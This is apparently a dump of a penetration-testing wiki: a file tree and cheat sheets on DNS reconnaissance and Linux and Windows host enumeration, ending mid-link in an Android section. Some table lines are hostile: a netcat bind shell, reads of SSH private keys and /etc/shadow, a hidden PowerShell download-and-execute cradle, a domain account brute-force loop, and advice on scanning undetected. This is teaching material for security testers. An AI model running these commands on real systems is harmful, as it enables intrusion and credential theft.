├── 1.Information-Gathering ├── How-to-gather-Whois-Information-Gathering.md ├── How-to-gather-dns-information.md ├── Linux │ └── README.md ├── README.md └── Windows │ └── README.md ├── 2.Vulnerability-Assessment ├── Android-Assessment │ └── README.md ├── Database-Assessment │ ├── mongodb │ │ ├── MongoDB Pentesting for Absolute Beginners.pdf │ │ ├── MongoDB_Lab.zip │ │ └── mongodb_hacking.md │ ├── mysql │ │ └── README.md │ ├── postgresql │ │ └── postgresql_hacking.md │ └── sqlite │ │ ├── curl_hacking.md │ │ └── sqlite_hacking.md ├── Network-Assessment │ ├── Fuzzers │ │ └── sulley │ │ │ └── fuzz_PCManftpd32.py │ └── Jenkins │ │ ├── Jenkins_hacking.md │ │ ├── execmd.groovy │ │ └── writefile.groovy ├── OS-Assessment │ └── OSX │ │ └── README.md └── README.md ├── 3.Exploitation-Tools ├── Network-Exploitation │ └── ports_number.md └── README.md ├── 4.Post-Exploitation ├── How-to-hack-Cisco-ASA-with-CVE-2016-6366.md ├── README.md └── Windows_ActiveDirectory │ ├── Execute_metasploit_vbs_payload_in_cmd_shell.md │ ├── Hacking_Windows_Active_Directory.md │ ├── How-to-dump-windows2012-credentials.md │ ├── How-to-use-vssadmin.md │ ├── PowerSploit_Invoke-Mimikatz_in_cmd.md │ ├── Windows_AD_commands.md │ ├── msf-download-execute-vbs-payload.png │ ├── msf-execute-vbs-payload.png │ ├── us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection-wp.pdf │ ├── us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf │ └── windows-2012-lsass-dump.png ├── 5.Privilege-Escalation └── README.md ├── 6.Maintaining-Access └── README.md ├── 7.Reporting ├── README.md └── amanhardikar-keepnote │ ├── knextinfra.zip │ ├── knwebapps.zip │ └── knwireless.zip ├── Books └── README.md ├── CTFS ├── Flick │ └── README.md ├── Nebula │ ├── README.md │ ├── level00.md │ ├── level01.md │ ├── level02.md │ ├── level03.md │ ├── level04.md │ ├── level05.md │ ├── level06.md │ ├── level07.md │ ├── level08.md │ ├── level09.md │ ├── level10.md │ ├── level11.md │ ├── level12.md │ ├── level13.md │ ├── level14.md │ ├── level15.md │ ├── level16.md │ ├── level17.md │ ├── level17.py │ ├── level18.md │ └── level19.md ├── NullByte │ └── NullByte-1.md └── README.md ├── Information-Security-Conferences └── README.md ├── LICENSE ├── README.md ├── Reverse-Engineering ├── IDA │ ├── Background_Analysis.md │ ├── Command_line_swithes.md │ ├── IDA-command-line-options.png │ ├── Instant_debugger.md │ ├── Main_Idea.md │ ├── Plugin_Options.md │ ├── The_Names_Windows.md │ └── TiGa-vid1_reverseMe │ │ ├── Keyfile.dat │ │ ├── TiGa-vid1_reverseMe.exe │ │ └── TiGa-vid1_reverseMe.idb ├── Reverse_Engineering_for_Beginners-en.pdf └── The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf └── System-Services ├── README.md └── services ├── service-ftp.md └── twisted-ftp.md /1.Information-Gathering/How-to-gather-dns-information.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # How to gather dns information ? 6 | 7 | - Passive mode 8 | - DNS Enumeration 9 | - OSINT 10 | - Offensive mode 11 | - spider websites 12 | - Tools 13 | - recon-ng 14 | - dnsrecon 15 | - theHarvester 16 | 17 | ## Passive mode 18 | 19 | ### DNS Enumeration 20 | 21 | **DNS enumeration** is the process of locating all the DNS servers and their corresponding records for an organization. A company may have both internal and external DNS servers that can yield information such as usernames, computer names, and IP addresses of potential target systems. There are a lot of tools that can be used to gain information for performing DNS enumeration. The examples of tool that can be used for DNS enumeration are NSlookup, DNSstuff, American Registry for Internet Numbers (ARIN), and Whois. To enumerate DNS, you must have understanding about DNS and how it works. 22 | 23 | You must have knowledge about DNS records. The list of DNS record provides an overview of types of resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses. In these domain servers, different record types are used for different purposes. The following list describes the common DNS record types and their use: 24 | 25 | |**DNS Record types**|methods|description| 26 | |:-----------------------|:----------|:--------------| 27 | |dns query|A|***Address record***, Returns a 32-bit IPv4 address, most commonly used to map hostnames to an IP address of the host, but it is also used for DNSBLs, storing subnet masks in RFC 1101, etc.| 28 | |dns query|CNAME|***Canonical name record***, Alias of one name to another: the DNS lookup will continue by retrying the lookup with the new name.| 29 | |dns query|AAAA|***IPv6 address record***, Returns a 128-bit IPv6 address, most commonly used to map hostnames to an IP address of the host.| 30 | |dns query|MX|***Mail exchange record***, Maps a domain name to a list of message transfer agents for that domain| 31 | |dns query|NS|***Name server record***, Delegates a DNS zone to use the given authoritative name servers| 32 | |dns query|SOA|***zone of authority record***, Specifies authoritative information about a DNS zone, including the primary name server, the email of the domain administrator, the domain serial number, and several timers relating to refreshing the zone.| 33 | |dns query|SPF|***Sender Policy Framework***, a simple email-validation system designed to detect email spoofing by providing a mechanism to allow receiving mail exchangers to check that incoming mail from a domain comes from a host authorized by that domain's administrators.| 34 | |dns query|TXT|***Text record***, Originally for arbitrary human-readable text in a DNS record.| 35 | |dns query|PTR|***Pointer record***, Pointer to a canonical name. Unlike a CNAME, DNS processing stops and just the name is returned. The most common use is for implementing reverse DNS lookups, but other uses include such things as DNS-SD.| 36 | |dns query|SRV|***Service locator***, Generalized service location record, used for newer protocols instead of creating protocol-specific records such as MX.| 37 | |dns query|NSEC|***Next Secure record***, Part of DNSSEC—used to prove a name does not exist. Uses the same format as the (obsolete) NXT record.| 38 | |dns query|AXFR|***Authoritative Zone Transfer***, Transfer entire zone file from the master name server to secondary name servers. **DNS Zone Transfer** is typically used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server will perform a specific zone transfer request from a ―name server.‖ If the name server allows zone transfers to occur, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text.| 39 | |dns query|IXFR|***Incremental Zone Transfer***, Transfer entire zone file from the master name server to secondary name servers.| 40 | |dns query|DNS Wildcard|Check if nameserver enable wildcard query, or dns faked.| 41 | |dns query|domain bruteforce|bruteforce subdomains with wordlists.| 42 | |dns query|reverse bruteforce|reverse ip for domain| 43 | |dns query|srv bruteforce|bruteforce srv records| 44 | |dns query|gtld bruteforce|bruteforce gtld records| 45 | |dns query|tld bruteforce|bruteforce tld records| 46 | 47 | ### OSINT 48 | 49 | |OSINT|Category|Description| 50 | |:----|:-------|:----------| 51 | |OSInt|Google|Spider domains from Google pages with domain:`demo.com`| 52 | |OSInt|Bing|Spider domains from Bing pages with domain:`demo.com`| 53 | |OSInt|Yahoo|Spider domains from Yahoo with domain:`demo.com`| 54 | |OSInt|Baidu|Spider domains from Baidu with domain:`demo.com`| 55 | |OSInt|Netcraft|Spider domains from netcraft searchdns pages| 56 | |OSInt|Github|Spider domain from github pages| 57 | |OSInt|Shodan|Search domains from Shodan| 58 | |OSInt|Censys|Search domains from censys| 59 | |OSInt|ZoomEye|Search domains from ZoomEye| 60 | 61 | 62 | ## Offensive mode 63 | 64 | |**offensive mode**|**methods**|**description**| 65 | |:-----------------|:----------|:--------------| 66 | |Websites|Spider default page|Scan default pages and spider domains| 67 | |Websites|Certificates|Scan domains certificates| 68 | 69 | 70 | ## Tools 71 | 72 | |**recon-ng Command**|**Description**| 73 | |:-------------------|:--------------| 74 | |use recon/domains-hosts/baidu_site|Search domains with baidu| 75 | |use recon/domains-hosts/bing_domain_api|Search domains with bing api| 76 | |use recon/domains-hosts/bing_domain_web|Search domains from bing web pages.| 77 | |use recon/domains-hosts/brute_hosts|Bruteforce subdomains| 78 | |use recon/domains-hosts/google_site_api|Search domains with google api| 79 | |use recon/domains-hosts/google_site_web|Search domains from google web pages.| 80 | |use recon/domains-hosts/netcraft|Search domains from netcraft pages.| 81 | 82 | 83 | 84 | |**dnsrecon Command**|**Description**| 85 | |:----------|:--------------| 86 | |dnsrecon -n `8.8.8.8` -d `demo.com`|Pleaes use a valid dns server in order to avoid dns fake. | 87 | |dnsrecon -d `demo.com` -t std|SOA, NS, A, AAAA, MX and SRV if AXRF on the NS servers fail.| 88 | |dnsrecon -d `demo.com` -t rvl|Reverse lookup of a given CIDR or IP range.| 89 | |dnsrecon -d `demo.com` -t brt -D `/path/to/subdomains.wd`|Brute force domains and hosts using a given dictionary.| 90 | |dnsrecon -d `demo.com` -t brt -D `/path/to/subdomains.wd` --iw|Brute force domains and hosts using a given dictionary. `Continue brute forcing a domain even if a wildcard records are discovered.`| 91 | |dnsrecon -d `demo.com` -t srv|SRV records| 92 | |dnsrecon -d `demo.com` -t axfr|Test all NS servers for a zone transfer.| 93 | |dnsrecon -d `demo.com` -t goo|Perform Google search for subdomains and hosts.| 94 | |dnsrecon -d `demo.com` -t tld|Remove the TLD of given domain and test against all TLDs registered in IANA.| 95 | |dnsrecon -d `demo.com` -t zonewalk|Perform a DNSSEC zone walk using NSEC records.| 96 | |dnsrecon -d `demo.com` --db `/path/to/results.sqlite`|Save results in a sqlite file.| 97 | |dnsrecon -d `demo.com` --xml `/path/to/results.xml`|Save results in a xml file.| 98 | |dnsrecon -d `demo.com` -c `/path/to/results.csv`|Save results in a csv file.| 99 | |dnsrecon -d `demo.com` -j `/path/to/results.json`|Save results in a json file.| 100 | 101 | 102 | |**theHarvester Command**|**Description**| 103 | |:-----------------------|:--------------| 104 | |theharvester -d `demo.com` -b all|Search google, googleCSE, bing, bingapi, pgp, linkedin,google-profiles, jigsaw, twitter, googleplus, all| 105 | |theharvester -d `demo.com` -n|Perform a DNS reverse query on all ranges discovered| 106 | |theharvester -d `demo.com` -c|Perform a DNS brute force for the domain name| 107 | |theharvester -d `demo.com` -t|Perform a DNS TLD expansion discovery| 108 | |theharvester -d `demo.com` -e `8.8.8.8`|Specfic a dns server| 109 | |theharvester -d `demo.com` -h|use SHODAN database to query discovered hosts| 110 | 111 | |**Metasploit Command**|**Description**| 112 | |:---------------------|:--------------| 113 | |msf > use auxiliary/gather/enum_dns|gather dns records information(A, AAAA, CNAME, ZoneTransfer, SRV, TLD, RVL, ...)| 114 | 115 | 116 | # Links 117 | 118 | 1. https://en.wikipedia.org/wiki/List_of_DNS_record_types 119 | 2. https://www.exploit-db.com/docs/12389.pdf 120 | 3. https://pentestlab.blog/tag/dns-enumeration/ 121 | 4. http://tools.kali.org/information-gathering/dnsrecon 122 | 5. https://github.com/nixawk/ig/ 123 | -------------------------------------------------------------------------------- /1.Information-Gathering/Linux/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Information Gathering - Linux 6 | 7 | ## System Architecture 8 | 9 | |**Command**|**Description**| 10 | |:----------|:--------------| 11 | |uname -a|The **uname** command reports basic information about a computer's software and hardware.| 12 | |cat /etc/issue|The file **/etc/issue** is a text file which contains a message or system identification to be printed before the login prompt.| 13 | |cat /etc/*-release|**/etc/lsb-release**, **/etc/redhat-release** files contain a description line which is parsed to get information. ex: "Distributor release x.x (Codename)"| 14 | |cat /proc/version|**/proc/version** specifies the version of the Linux kernel, the version of gcc used to compile the kernel, and the time of kernel compilation. It also contains the kernel compiler's user name.| 15 | |cat /proc/sys/kernel/version|The files in **/proc/sys/kernel/** can be used to tune and monitor miscellaneous and general things in the operation of the Linux kernel. [**Kernel - Documentation**](https://www.kernel.org/doc/Documentation/sysctl/kernel.txt)| 16 | 17 | 18 | ## Processes 19 | 20 | |**Command**|**Description**| 21 | |:----------|:--------------| 22 | |ps -ef
ps aux|**ps** can report a snapshot of the current processes.| 23 | |top|**top** command displays processor activity of your Linux box and also displays tasks managed by kernel in real-time. It'll show processor and memory are being used and other information like running processes.| 24 | |ls -al /proc/|**/proc** is very special in that it is also a virtual filesystem. It's sometimes referred to as a process information pseudo-file system. It doesn't contain 'real' files but runtime system information (e.g. system memory, devices mounted, hardware configuration, etc). | 25 | |ls -al /proc/3080|View information about PID **3080**.| 26 | 27 | ## Users and Groups 28 | 29 | |**Command**|**Description**| 30 | |:----------|:--------------| 31 | |id|Find a user's UID or GID and other information.| 32 | |w|Display who is logged into the Linux and Unix-like server.| 33 | |whoami|Display the user name of the owner of the current login session to standard output.| 34 | |lastlog|Formats and prints the contents of the last login log /var/log/lastlog file.| 35 | |cat /etc/passwd|A text-based database of information about users that may log in to the system or other operating system user identities that own running processes.| 36 | |cat /etc/shadow|**/etc/shadow** is used to increase the security level of passwords by restricting all but highly privileged users' access to hashed password data. Typically, that data is kept in files owned by and accessible only by the super user.| 37 | |cat /etc/master.passwd|**/etc/master.passwd** on BSD systems| 38 | |cat /etc/sudoers|**/etc/sudoers** has the rules that users have to follow when using sudo command.| 39 | |sudo -V|Print the sudo version string| 40 | |cat ~/.ssh/authorized_keys|With public key authentication, the authenticating entity has a public key and a private key. Each key is a large number with special mathematical properties. The private key is kept on the computer you log in from, while the public key is stored on the **.ssh/authorized_keys** file on all the computers you want to log in to. | 41 | |cat ~/.ssh/identity.pub|The file **identity.pub** contains your public key, which can be added to other system's authorized keys files. | 42 | |cat ~/.ssh/identity|The ssh client allows you to selects a file from which the identity (private key) for RSA or DSA authentication is read.| 43 | |cat ~/.ssh/id_rsa.pub|RSA public key will be saved as .ssh/id_rsa.pub.| 44 | |cat ~/.ssh/id_rsa|RSA private key saved as .ssh/id_rsa in your home folder.| 45 | |cat ~/.ssh/id_dsa.pub|DSA public key will be saved as .ssh/id_rsa.pub.| 46 | |cat ~/.ssh/id_dsa|DSA private key saved as .ssh/id_rsa in your home folder.| 47 | |cat /etc/ssh/ssh_config|OpenSSH SSH client configuration files| 48 | |cat /etc/ssh/sshd_config|OpenSSH SSH Server configuration files| 49 | |cat /etc/ssh/ssh_host_dsa_key.pub|The DSA public key used by the sshd daemon.| 50 | |cat /etc/ssh/ssh_host_dsa_key|The DSA private key used by the sshd daemon.| 51 | |cat /etc/ssh/ssh_host_rsa_key.pub|The RSA public key used by the sshd daemon for version 2 of the SSH protocol.| 52 | |cat /etc/ssh/ssh_host_rsa_key|The RSA private key used by the sshd daemon.| 53 | 54 | 55 | ## Services 56 | 57 | |**Command**|**Description**| 58 | |:----------|:--------------| 59 | |service -status-all|Check status of all services| 60 | |systemctl -a|List all units installed in the file system.| 61 | |service `servicename` start
systemctl start `servicename`|Start a service| 62 | |service `servicename` stop
systemctl stop `servicename`|Stop a service| 63 | |service `servicename` status
systemctl status `servicename`|Show the status of a service| 64 | |cat /etc/services|/etc/services maps port numbers to named services.| 65 | 66 | ## Security 67 | 68 | |**Command**|**Description**| 69 | |:----------|:--------------| 70 | |iptables -L|List all rules in the selected chain.| 71 | |iptables -F|Flush the selected chain.| 72 | |iptables -A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT|Please try **iptables -p icmp --help** for more details.| 73 | |iptables -A INPUT -p tcp -m tcp --sport 80 -m state --state RELATED,ESTABLISHED -j ACCEPT|Allow tcp connections from src port 80| 74 | |iptables -A OUTPUT -p tcp -m tcp --dport 80 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT|Allow tcp connections from/to dst port 80.| 75 | |iptables -A INPUT -p udp -m udp --sport 53 -m state --state RELATED,ESTABLISHED -j ACCEPT|Allow udp connections from src port 80| 76 | |iptables -A OUTPUT -p udp -m udp --dport 53 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT|Allow udp connections from/to dst port 53.| 77 | |iptables -A OUTPUT -p tcp -m tcp --sport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT|Allow localhost to connect to localhost:55552| 78 | 79 | ## Networking 80 | 81 | |**Command**|**Description**| 82 | |:----------|:--------------| 83 | |ifconfig -a|display all interfaces which are currently available, even if down.| 84 | |hostname|show or set the system's host name.| 85 | |dnsdomainname|show the system's DNS domain name.| 86 | |netstat -antp|show network status| 87 | |netstat -anup|show network status| 88 | |chkconfig --list|| 89 | |lsof -nPi|list open files| 90 | |route -e|show / manipulate the IP routing table| 91 | |iwconfig|configure a wireless network interface| 92 | |cat /etc/resolv.conf|The resolver configuration file contains information that is read by the resolver routines the first time they are invoked by a process. The file is designed to be human readable and contains a list of keywords with values that provide various types of resolver information. If this file does not exist, only the name server on the local machine will be queried; the domain name is determined from the hostname and the domain search path is constructed from the domain name.| 93 | |cat /etc/hosts|**/etc/hosts** is a simple text file that associates IP addresses with hostnames, one line per IP address.| 94 | |cat /etc/network/interfaces|**/etc/network/interfaces** file contains network interface configuration information.| 95 | |cat /etc/sysconfig/network|**/etc/sysconfig/network** file is used to specify information about the desired network configuration on your server.| 96 | |cat /etc/networks|**/etc/networks** is a plain ASCII file that describes known DARPA networks and symbolic names for these networks.| 97 | |cat /proc/net/tcp|Print tcp info in hex mode| 98 | |cat /proc/net/udp|Print udp info in hex mode| 99 | |cat /proc/net/icmp|Print icmp info in hex mode| 100 | |cat /proc/net/route|Print route info in hex mode| 101 | |cat /etc/inetd.conf|inetd, called also the super server, will load a network program based upon a request from the network. The inetd.conf file tells inetd which ports to listen to and what server to start for each port.| 102 | |cat /etc/xinetd.conf|xinetd.conf is the configuration file that determines the services provided by xinetd.| 103 | |ls -R /etc/network/|Show files about network configuration| 104 | |ls -al /etc/init.d|List all init scripts| 105 | |iptables -L -t nat|Print rules of nat chain| 106 | |iptables -L -t mangle|Print rules of mangle chain| 107 | |tcpdump|tcpdump cheat sheet| 108 | |nc -v `host` `port`|Make a tcp connection to host:port| 109 | |nc -v -e /bin/sh -l -p `port`|Reverse a /bin/sh shell to localhost:port| 110 | 111 | ## File Systems 112 | 113 | |**Command**|**Description**| 114 | |:----------|:--------------| 115 | |cat /etc/profile|/etc/profile contains Linux system wide environment and startup programs. It is used by all users with bash, ksh, sh shell.| 116 | |cat /etc/bashrc|/etc/bashrc or /etc/bash.bashrc is the systemwide bash per-interactive-shell startup file. Is is used system wide functions and aliases. | 117 | |cat ~/.bash_profile|similar to /etc/profile, but just for current user| 118 | |car ~/.bash_history|Print current user bash commands history| 119 | |cat ~/.bashrc|~/.bashrc is the individual per-interactive-shell startup file stored in your home directory $HOME.| 120 | |car ~/.zshrc|~/.zshrc is the individual per-interactive-shell startup file stored in your home directory $HOME.| 121 | |cat ~/.bash_logout|The file ~/.bash_logout is not used for an invocation of the shell. It is read and executed when a user exits from an interactive login shell.| 122 | |ls -al /var/log/|List all logs files| 123 | |find / -perm -1000 -type d 2>/dev/null | Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.| 124 | |find / -perm -g=s -type f 2>/dev/null | SGID (chmod 2000) - run as the group, not the user who started it.| 125 | |find / -perm -u=s -type f 2>/dev/null | SUID (chmod 4000) - run as the owner, not the user who started it.| 126 | |find / -perm -g=s -o -perm -u=s -type f 2>/dev/null | SGID or SUID| 127 | |for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done | Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)| 128 | |find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null|find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)| 129 | |find / -writable -type d 2>/dev/null| world-writeable folders| 130 | |find / -perm -222 -type d 2>/dev/null|world-writeable folders| 131 | |find / -perm -o w -type d 2>/dev/null| world-writeable folders| 132 | |find / -perm -o x -type d 2>/dev/null|world-executable folders| 133 | |find / \( -perm -o w -perm -o x \) -type d 2>/dev/null | world-writeable & executable folders| 134 | |find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print|world-writeable files| 135 | |find /dir -xdev \( -nouser -o -nogroup \) -print|Noowner files| 136 | 137 | ## Scheduled 138 | 139 | |**Command**|**Description**| 140 | |:----------|:--------------| 141 | |crontab -l|display current contab on standard output| 142 | |ls -alh /var/spool/cron|| 143 | |ls -al /etc/cron*|| 144 | |cat /etc/cron*|| 145 | |cat /etc/at.allow|The /etc/at.allow and /etc/at.deny files determine which user can submit commands for later execution via at or batch.| 146 | |cat /etc/at.deny|The /etc/at.allow and /etc/at.deny files determine which user can submit commands for later execution via at or batch.| 147 | |cat /etc/cron.allow|| 148 | |cat /etc/cron.deny|| 149 | |cat /etc/crontab|| 150 | |cat /etc/anacrontab|| 151 | |ls -la /var/spool/cron/crontabs|List all users's crontab files| 152 | |cat /var/spool/cron/crontabs/root|Print root user crontab| 153 | 154 | 155 | # Links 156 | 157 | 1. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 158 | 2. https://github.com/CISOfy/lynis 159 | 3. https://github.com/rebootuser/LinEnum 160 | 4. https://github.com/nixawk/metasploit-modules/blob/master/.msf4/modules/post/linux/gather/enum_linux.rb 161 | 5. http://www.iptables.org/documentation/ 162 | 4. http://packetlife.net/media/library/12/tcpdump.pdf 163 | -------------------------------------------------------------------------------- /1.Information-Gathering/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > 2 | 3 | ---- 4 | 5 | # Information Gathering 6 | 7 | In the *information gathering* phase, you will gather any information you can about the organization you are attacking by using social-media networks, Google hacking, footprinting the target, and so on. One of the most important skills a penetration tester can have is the ability to learn about a target, including how it behaves, how it operates, and how it ultimately can be attacked. The information that you gather about your target will give you valuable insight into the types of security controls in place. 8 | 9 | During *information gathering*, you attempt to identify what protection mechanisms are in place at the target by slowly starting to probe its systems. For example, an organization will often only allow traffic on a certain subset of ports on externally facing devices, and if you query the organization on any- thing other than a whitelisted port, you will be blocked. It is generally a good idea to test this blocking behavior by initially probing from an expendable IP address that you are willing to have blocked or detected. The same holds true when you’re testing web applications, where, after a certain threshold, the web application firewalls will block you from making further requests. 10 | To remain undetected during these sorts of tests, you can perform your initial scans from IP address ranges that can’t be linked back to you and your team. Typically, organizations with an external presence on the Internet experience attacks every day, and your initial probing will likely be an unde- tected part of the background noise. 11 | 12 | |**Information Categroy**|**Bookmarks**| 13 | |:---------------------|:----------| 14 | | IP Analysis |https://www.iana.org/numbers
https://www.iana.org/assignments/as-numbers/as-numbers.xml
https://www.iso.org/obp/ui/#home
https://www.ultratools.com/tools/toolsHome
https://www.robtex.com/
http://www.team-cymru.org/IP-ASN-mapping.html
http://www.iplocation.net/
http://thyme.apnic.net/
http://bgp.he.net/
https://ipinfo.io| 15 | | Whois Analysis |https://www.iana.org/numbers
http://www.domaintools.com/| 16 | | DNS Analysis |http://www.alexa.com/
http://searchdns.netcraft.com/
http://centralops.net/co/
http://www.yougetsignal.com/
http://webhosting.info/whois/
http://reverseip.domaintools.com/
http://viewdns.info/reverseip/
| 17 | | Identify Live Hosts |https://nmap.org/dist/sigs/?C=M;O=D
https://zmap.io/
http://masscan.net/
http://www.secdev.org/projects/scapy/| 18 | | IDS/IPS Identification |https://www.monkey.org/~dugsong/fragroute/
http://pytbull.sourceforge.net/
http://tcpreplay.synfin.net/| 19 | | OSINT |https://www.shodan.io/
https://www.exploit-db.com/google-hacking-database/
| 20 | 21 | # Links 22 | 23 | 1. [**How to gather Windows information ?**](./Windows/README.md) 24 | 2. [**How to gather Linux information ?**](./Linux/README.md) 25 | 3. [**How to gather Mac OSX information ?**]() 26 | -------------------------------------------------------------------------------- /1.Information-Gathering/Windows/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) >, < [patitoaxel](https://github.com/patitoaxel) > 2 | 3 | ---- 4 | 5 | # Information Gathering - Windows 6 | 7 | ## System Architecture 8 | 9 | |**Command**|**Description**| 10 | |:----------|:--------------| 11 | |ver|Displays the Windows version.| 12 | |systeminfo
systeminfo /S `ComputerName` /U `username` /P `password`|This tool displays operating system configuration information for a local or remote machine, including service pack levels.| 13 | |wmic os list brief|Installed Operating System/s management.| 14 | |wmic computersystem list full|Computer system management.| 15 | 16 | ## Processes 17 | 18 | |**Command**|**Description**| 19 | |:----------|:--------------| 20 | |tasklist
tasklist /M
tasklist /V|displays a list of currently running processes on a local machine.| 21 | |tasklist /FI "IMAGENAME eq cmd.exe"
tasklist /FI "PID ne 0"|Displays a set of processes that match a given criteria specified by the filter.| 22 | |tasklist /S `SERVER` /U `DOMAIN\username` /P `password`|displays a list of currently running processes on remote machine.| 23 | |wmic process list brief|Process management.| 24 | 25 | ## Users and Groups 26 | 27 | |**Command**|**Description**| 28 | |:----------|:--------------| 29 | |whoami|Lists information about the user you are currently logged in as.| 30 | |net user|displays user account information.| 31 | |net user /domain|Performs the operation on the domain controller in the computer's primary domain.| 32 | |net localgroup administrators|displays the local administrators group on the computer.| 33 | |net localgroup administrators /domain|displays the local administrators group on current domain controller.| 34 | |net group /domain|Display groups and performs the operation on the domain controller in the current domain. | 35 | |net group "Domain Admins" /domain|Query users from domain admins in current domain.| 36 | |net group "Domain Computers" /domain|Query all domain computers in current domain.| 37 | |net group "Domain Controllers" /domain|Query Domain Comtrollers Computers.| 38 | |net group "Domain Policy Creator Owners" /domain|Query Domain Policy Creators.| 39 | |net accounts /domain|Updates the user accounts database and modifies password and logon requirements for all accounts. Performs the operation on the primary domain controller of the current domain.| 40 | |wmic useraccount|User account management.| 41 | |wmic useraccount LIST BRIEF|Print account information.| 42 | 43 | ## Services 44 | 45 | |**Command**|**Description**| 46 | |:----------|:--------------| 47 | |sc qc `servicename`|Queries the configuration information for a service. (**BINARY_PATH_NAME** and so on.)| 48 | |sc query `servicename`|Queries the status for a service, or enumerates the status for types of services.| 49 | |sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys|Creates a service entry in the registry and Service Database.| 50 | 51 | ## Security 52 | 53 | |**Command**|**Description**| 54 | |:----------|:--------------| 55 | |wmic qfe get hotfixid| Information about patches installed on the windows| 56 | |NETSH FIREWALL show all|Show Allowed programs configuration for Domain/Standard profile.| 57 | 58 | 59 | ## Networking 60 | 61 | |**Command**|**Description**| 62 | |:----------|:--------------| 63 | |ipconfig /all|Displays the full TCP/IP configuration for all adapters. | 64 | |ipconfig /displaydns|Displays the contents of the DNS client resolver cache, which includes both entries preloaded from the local Hosts file and any recently obtained resource records for name queries resolved by the computer. The DNS Client service uses this information to resolve frequently queried names quickly, before querying its configured DNS servers.| 65 | |netstat -ano|Displays active TCP connections and includes the process ID (PID) for each connection. | 66 | |netstat -ano -p tcp|Show tcp connections.| 67 | |netstat -ano -p udp|Show udp connections.| 68 | |netstat -r|Displays the system's routing table.| 69 | |route print|Displays the system's routing table.| 70 | |net view|Displays a list of domains, computers, or resources that are being shared by the specified computer. | 71 | |net view /domain:`DOMAINNAME`|Specifies the domain for which you want to view the available computers. If you omit DomainName, /domain displays all of the domains in the network.| 72 | |net view \\\\`ComputerName`|Specifies the computer that contains the shared resources that you want to view.| 73 | |wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"|Create a new process on remote server.| 74 | |powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"|Execute code from remote server.| 75 | |powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"|Download a file from remote server.| 76 | 77 | 78 | ## File Systems 79 | 80 | |**Command**|**Description**| 81 | |:----------|:--------------| 82 | |type C:\Windows\system32\demo.txt|Show the contents of a file. | 83 | |dir /a|Displays files with specified attributes.| 84 | |dir /s|Searches sub-directories| 85 | |dir /s "\*`match-text`\*"|Searches for the word entered in the `match-text` section in all sub-dirs of the current directory.| 86 | |find /I `password` C:\Windows\System32\*.ini|Searches for a `password` string in a file or files.| 87 | |tree /F C:\Windows\system32|Graphically displays the folder structure of a drive or path.| 88 | |fsutil fsinfo drives|Lists the current drives on the system.| 89 | |wmic volume|Local storage volume management.| 90 | |wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber|Local storage device management.| 91 | |net share|displays information about all of the resources that are shared on the local computer.| 92 | |wmic share|Shared resource management.| 93 | |net use \\\\`ip`\ipc$ `password` /user:`username`|Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. | 94 | |@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\\\DomainController\IPC$ /user:\%n %p 1>NUL 2>&1 && @echo [*] %n:%p &&|Bruteforce Windows accounts| 95 | |FOR /F %f in ('dir /b /s C:\') do find /I "password" %f|Search `password` in file or files from C:\| 96 | 97 | 98 | 99 | 100 | ## Startup and Shutdown 101 | 102 | |**Command**|**Description**| 103 | |:----------|:--------------| 104 | |wmic startup|Management of commands that run automatically when users log onto the computer system.| 105 | 106 | # Links 107 | 108 | 1. [Windows Internals Book](https://technet.microsoft.com/en-us/sysinternals/bb963901.aspx). 109 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Android-Assessment/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | ## Android Hacking and Security 6 | 7 | 1. [exploiting securing application components](http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/) 8 | 2. [content provider leakage](http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/) 9 | 3. [exploiting broadcast receivers](http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/) 10 | 4. [exploiting unintended data leakage side channel data 